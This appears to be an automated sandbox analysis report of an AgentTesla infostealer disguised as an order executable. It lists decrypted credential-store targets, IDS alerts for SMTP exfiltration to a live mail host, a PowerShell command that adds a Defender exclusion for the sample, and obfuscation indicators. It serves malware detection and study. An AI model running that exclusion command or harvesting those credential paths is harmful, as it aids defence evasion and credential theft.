Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpack String decryptor: \UltraVNC\ultravnc.ini
Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpack String decryptor: passwd
Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpack String decryptor: UltraVNC
Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpack String decryptor: ProgramFiles
Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpack String decryptor: \UltraVNC\ultravnc.ini
Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpack String decryptor: passwd2
Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpack String decryptor: UltraVNC
Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpack String decryptor: ProgramFiles(x86)
Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpack String decryptor: \UltraVNC\ultravnc.ini
Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpack String decryptor: passwd
Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpack String decryptor: UltraVNC
Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpack String decryptor: ProgramFiles(x86)
Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpack String decryptor: \UltraVNC\ultravnc.ini
Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpack String decryptor: passwd2
Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpack String decryptor: JDownloader 2.0
Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpack String decryptor: JDownloader 2.0\cfg
Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpack String decryptor: org.jdownloader.settings.AccountSettings.accounts.ejs
Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpack String decryptor: JDownloader 2.0\cfg
Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpack String decryptor: jd.controlling.authentication.AuthenticationControllerSettings.list.ejs
Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpack String decryptor: Paltalk
Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpack String decryptor: Software\A.V.M.\Paltalk NG\common_settings\core\users\creds\
Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpack String decryptor: nickname
Source: order2024-10-07_174915.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: order2024-10-07_174915.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: fSYT.pdbSHA256Q source: order2024-10-07_174915.exe
Source: Binary string: fSYT.pdb source: order2024-10-07_174915.exe

Networking

Source: Network traffic Suricata IDS: 2030171 - Severity 1 - ET MALWARE AgentTesla Exfil Via SMTP : 192.168.2.7:49704 -> 199.79.62.115:587
Source: Network traffic Suricata IDS: 2839723 - Severity 1 - ETPRO MALWARE Win32/Agent Tesla SMTP Activity : 192.168.2.7:49704 -> 199.79.62.115:587
Source: global traffic TCP traffic: 192.168.2.7:49704 -> 199.79.62.115:587
Source: Joe Sandbox View IP Address: 199.79.62.115
Source: Joe Sandbox View ASN Name: PUBLIC-DOMAIN-REGISTRYUS
Source: global traffic TCP traffic: 192.168.2.7:49704 -> 199.79.62.115:587
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic DNS traffic detected: DNS query: mail.mbarieservicesltd.com
Source: global traffic DNS traffic detected: DNS query: 18.31.95.13.in-addr.arpa
Source: order2024-10-07_174915.exe, 00000008.00000002.2504284574.0000000002E7A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mail.mbarieservicesltd.com
Source: order2024-10-07_174915.exe, 00000000.00000002.1277438548.00000000032E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

System Summary

Source: initial sample Static PE information: Filename: order2024-10-07_174915.exe
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe Code function: 0_2_0165D55C
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe Code function: 0_2_05909838
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe Code function: 0_2_05909848
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe Code function: 0_2_07AA90D0
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe Code function: 0_2_07AA4F80
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe Code function: 0_2_07AA4F70
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe Code function: 0_2_07AA34A0
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe Code function: 0_2_07AA3493
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe Code function: 0_2_07AA2C30
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe Code function: 0_2_07AA2C0F
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe Code function: 0_2_07AA4B48
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe Code function: 0_2_07AA3068
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe Code function: 8_2_02C6E1C0
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe Code function: 8_2_02C64140
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe Code function: 8_2_02C64D58
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe Code function: 8_2_02C64488
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe Code function: 8_2_02C61D04
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe Code function: 8_2_065A1CB0
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe Code function: 8_2_065A3918
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe Code function: 8_2_065C5F88
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe Code function: 8_2_065CE508
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe Code function: 8_2_065C8268
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe Code function: 8_2_065C92A8
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe Code function: 8_2_065C4370
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe Code function: 8_2_065CABD0
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe Code function: 8_2_065C89F0
Source: order2024-10-07_174915.exe, 00000000.00000002.1276172729.000000000154E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs order2024-10-07_174915.exe
Source: order2024-10-07_174915.exe, 00000000.00000002.1282489119.00000000042E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs order2024-10-07_174915.exe
Source: order2024-10-07_174915.exe, 00000000.00000002.1282489119.000000000450D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename7b99aba2-3c62-4861-97de-170caa2c3039.exe4 vs order2024-10-07_174915.exe
Source: order2024-10-07_174915.exe, 00000000.00000002.1286419400.00000000079F0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs order2024-10-07_174915.exe
Source: order2024-10-07_174915.exe, 00000000.00000002.1277438548.00000000032E1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename7b99aba2-3c62-4861-97de-170caa2c3039.exe4 vs order2024-10-07_174915.exe
Source: order2024-10-07_174915.exe, 00000008.00000002.2501932436.000000000042C000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: OriginalFilename7b99aba2-3c62-4861-97de-170caa2c3039.exe4 vs order2024-10-07_174915.exe
Source: order2024-10-07_174915.exe, 00000008.00000002.2502232905.0000000000F39000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: OriginalFilenameUNKNOWN_FILET vs order2024-10-07_174915.exe
Source: order2024-10-07_174915.exe Binary or memory string: OriginalFilenamefSYT.exe8 vs order2024-10-07_174915.exe
Source: order2024-10-07_174915.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: order2024-10-07_174915.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpack, O.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpack, O.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpack, P.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpack, P.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpack, N.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpack, N.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpack, N.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpack, N.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.order2024-10-07_174915.exe.43bf190.4.raw.unpack, URUyb8YnygvhLJ7Xqm.cs Security API names: _0020.SetAccessControl
Source: 0.2.order2024-10-07_174915.exe.43bf190.4.raw.unpack, URUyb8YnygvhLJ7Xqm.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.order2024-10-07_174915.exe.43bf190.4.raw.unpack, URUyb8YnygvhLJ7Xqm.cs Security API names: _0020.AddAccessRule
Source: 0.2.order2024-10-07_174915.exe.44299b0.2.raw.unpack, cDSfec1lfX3MVo74qR.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.order2024-10-07_174915.exe.79f0000.6.raw.unpack, URUyb8YnygvhLJ7Xqm.cs Security API names: _0020.SetAccessControl
Source: 0.2.order2024-10-07_174915.exe.79f0000.6.raw.unpack, URUyb8YnygvhLJ7Xqm.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.order2024-10-07_174915.exe.79f0000.6.raw.unpack, URUyb8YnygvhLJ7Xqm.cs Security API names: _0020.AddAccessRule
Source: 0.2.order2024-10-07_174915.exe.44299b0.2.raw.unpack, URUyb8YnygvhLJ7Xqm.cs Security API names: _0020.SetAccessControl
Source: 0.2.order2024-10-07_174915.exe.44299b0.2.raw.unpack, URUyb8YnygvhLJ7Xqm.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.order2024-10-07_174915.exe.44299b0.2.raw.unpack, URUyb8YnygvhLJ7Xqm.cs Security API names: _0020.AddAccessRule
Source: 0.2.order2024-10-07_174915.exe.43bf190.4.raw.unpack, cDSfec1lfX3MVo74qR.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.order2024-10-07_174915.exe.79f0000.6.raw.unpack, cDSfec1lfX3MVo74qR.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@9/6@2/1
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\order2024-10-07_174915.exe.log
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4340:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rqwlcwdx.z15.ps1
Source: order2024-10-07_174915.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: order2024-10-07_174915.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: order2024-10-07_174915.exe ReversingLabs: Detection: 52%
Source: unknown Process created: C:\Users\user\Desktop\order2024-10-07_174915.exe "C:\Users\user\Desktop\order2024-10-07_174915.exe"
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\order2024-10-07_174915.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe Process created: C:\Users\user\Desktop\order2024-10-07_174915.exe "C:\Users\user\Desktop\order2024-10-07_174915.exe"
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe Process created: C:\Users\user\Desktop\order2024-10-07_174915.exe "C:\Users\user\Desktop\order2024-10-07_174915.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\order2024-10-07_174915.exe"
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe Process created: C:\Users\user\Desktop\order2024-10-07_174915.exe "C:\Users\user\Desktop\order2024-10-07_174915.exe"
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe Process created: C:\Users\user\Desktop\order2024-10-07_174915.exe "C:\Users\user\Desktop\order2024-10-07_174915.exe"
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe Section loaded: dwrite.dll
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe Section loaded: vaultcli.dll
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: order2024-10-07_174915.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: order2024-10-07_174915.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: order2024-10-07_174915.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: fSYT.pdbSHA256Q source: order2024-10-07_174915.exe
Source: Binary string: fSYT.pdb source: order2024-10-07_174915.exe

Data Obfuscation

Source: order2024-10-07_174915.exe, Form1.cs | .Net Code: InitializeComponent contains xor as well as GetObject
Source: 0.2.order2024-10-07_174915.exe.44299b0.2.raw.unpack, URUyb8YnygvhLJ7Xqm.cs | .Net Code: qGHSvnZgiT System.Reflection.Assembly.Load(byte[])
Source: 0.2.order2024-10-07_174915.exe.5f00000.5.raw.unpack, RZ.cs | .Net Code: System.Reflection.Assembly.Load(byte[])
Source: 0.2.order2024-10-07_174915.exe.3314944.0.raw.unpack, RZ.cs | .Net Code: System.Reflection.Assembly.Load(byte[])
Source: 0.2.order2024-10-07_174915.exe.79f0000.6.raw.unpack, URUyb8YnygvhLJ7Xqm.cs | .Net Code: qGHSvnZgiT System.Reflection.Assembly.Load(byte[])
Source: 0.2.order2024-10-07_174915.exe.43bf190.4.raw.unpack, URUyb8YnygvhLJ7Xqm.cs | .Net Code: qGHSvnZgiT System.Reflection.Assembly.Load(byte[])
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe | Code function: 0_2_0165F508 push esp; iretd 0_2_0165F539
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe | Code function: 0_2_0165F462 push esp; iretd 0_2_0165F539
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe | Code function: 0_2_07AA8461 pushfd ; retf 0_2_07AA846D
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe | Code function: 8_2_065C1C00 push eax; ret 8_2_065C1C01
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe | Code function: 8_2_065C1C3A pushad ; ret 8_2_065C1C41
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe | Code function: 8_2_065C1C98 pushfd ; ret 8_2_065C1CA1
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe | Code function: 8_2_065C2020 push es; ret 8_2_065C2030
Source: order2024-10-07_174915.exe | Static PE information: section name: .text entropy: 7.985572066441394
Source: 0.2.order2024-10-07_174915.exe.44299b0.2.raw.unpack, iyJguyOGUIj6nN2wqt.cs | High entropy of concatenated method names: 'Dispose', 'fh1VyYRlQD', 'GWvCdGQVhK', 'tZd00kPa2K', 'v06VaCuYcY', 'ELoVz9Njjy', 'ProcessDialogKey', 'zx3CQChkGT', 'UEoCVuSOiS', 'IKwCCuuc5J'
Source: 0.2.order2024-10-07_174915.exe.44299b0.2.raw.unpack, bnydmYgJeoOcsLe2k4.cs | High entropy of concatenated method names: 'LMhiEmMKX5', 'cWqi5eOaQm', 'BgwivvqbZD', 'aotihv0Ida', 'HNtipTHuiK', 'svaijPRvSZ', 'OeviIFnmWY', 'a62i1iPibe', 'fopiN3HAsr', 'TlXimcdumf'
Source: 0.2.order2024-10-07_174915.exe.44299b0.2.raw.unpack, LsTn8ZXu0oCEl1N7po.cs | High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'BKXCygbZMR', 'Oa7Ca34QEP', 'GI9CzZoiyW', 'vC66QNfcJw', 'VEv6Vq3sVW', 'TMd6Ca4lB8', 'AyH66LbK1v', 'RW5SBcW3tTMGDdiHBb0'
Source: 0.2.order2024-10-07_174915.exe.44299b0.2.raw.unpack, cDSfec1lfX3MVo74qR.cs | High entropy of concatenated method names: 'z9BOWYdxIf', 'RWIOL5Ydg1', 'YV9OPbRTDt', 's3hO3K1PDF', 'Ia3OGSm9IM', 'ybSOTCj2Ax', 'mnROtuKlKZ', 'qkgOBb5dnk', 'QUqOyb76Mc', 'gp7OaRcSIe'
Source: 0.2.order2024-10-07_174915.exe.44299b0.2.raw.unpack, URUyb8YnygvhLJ7Xqm.cs | High entropy of concatenated method names: 'C246sTi279', 'uJn6lIrXV8', 'NJ46OYYu5Y', 'oFM6X0bfGP', 'hMY6kQpDMk', 'xgP6oNYitW', 'K6Q6iKfdWJ', 'qX86YwFo0g', 'cqH6Mw38tU', 'xmu6bgKiqj'
